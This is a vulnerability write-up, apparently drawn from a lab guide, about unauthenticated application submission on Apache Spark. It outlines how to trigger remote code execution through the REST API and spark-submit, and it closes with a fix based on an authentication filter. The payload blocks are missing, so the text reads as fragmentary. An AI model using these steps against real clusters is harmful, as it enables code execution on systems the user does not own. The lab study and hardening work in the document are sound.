Unauthorized Access Vulnerability in Spark
Vulnerability Description
Apache Spark is a cluster computing system that supports users submitting applications to the management node, which are then distributed to the cluster for execution. If the management node does not have access control enabled, an attacker can execute arbitrary code in the cluster. The essence of this vulnerability is that an unauthorized user can submit an application to the Master node, which the Master node will distribute to the Slave node for execution. If the application contains malicious code, it will result in arbitrary code execution, threatening the security of the entire Spark cluster.
Environment Setup
git clone https://github.com/vulhub/vulhub.git
cd /opt/vulhub-master/spark/unacc/
docker-compose up Vulnerability Detection
After the environment is started, you can access the management page of the master by visiting http://your-ip:8080, and you can access the management page of the slave by visiting http://your-ip:8081.


The vulnerability is that an unauthorized user can submit an application to the management node, which is actually malicious code.
There are two ways to submit:
利用REST API
payload

Among them, spark.jars is the compiled application, mainClass is the class to be run, and appArgs are the arguments passed to the application.
At this point, access http://your-ip:8081 has loaded exploit.jar

The returned package contains a submissionId (driver-20220516074753-0000), then visit http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout to view the execution result:

Using the submissions gateway (integrated in port 7077)
If port 6066 is not accessible or has been restricted, we can use the master's main port 7077 to submit the application.
The method is to use the Apache Spark script bin/spark-submit that comes with Spark:
If the master parameter you specify is a REST server, this script will first try to submit the application using the REST API; if it finds that it is not a REST server, it will degrade to using the submission gateway to submit the application.
The way to view the results is the same as before.
MSF
Solution
Create an Authenticated Filter Corresponding Jar Package
Compile the source code using Maven in IntelliJ IDEA.
Add Maven Dependency
After creating a Maven project, add the following dependency to pom.xml:
Create a package named com.demo.

This is a Java class, "SparkAuthFilter", that implements the Filter interface. It provides authentication for Spark services.
The class contains the following fields:
LOG: A Logger for logging purposes.
username: A string to store the username for authentication.
password: A string to store the password for authentication.
realm: A string to store the realm name, which is set to "Protected".
It overrides the following methods:
init: initializes the filter by retrieving the username and password from the filter configuration.
doFilter: this method performs the authentication by checking the Authorization header in the HTTP request. If it exists, the header is decoded and the username and password are retrieved. The retrieved values are then compared with the pre-defined username and password. If they match, the request is allowed to proceed through the filter chain. Otherwise, an error 401 "Unauthorized" is returned.
destroy: does nothing.
It also contains two helper methods:
unauthorized: sets the WWW-Authenticate header in the response with the realm name and returns error 401 with a custom message.
main: does nothing.
Compile the project using Maven, and the compiled jar package can be found in the target directory.

Execute Configuration
Upload the jar package to the
jarsdirectory of Spark.In the configuration file
spark-defaults.conf, add the following configuration:
Restart the Spark cluster.

Last updated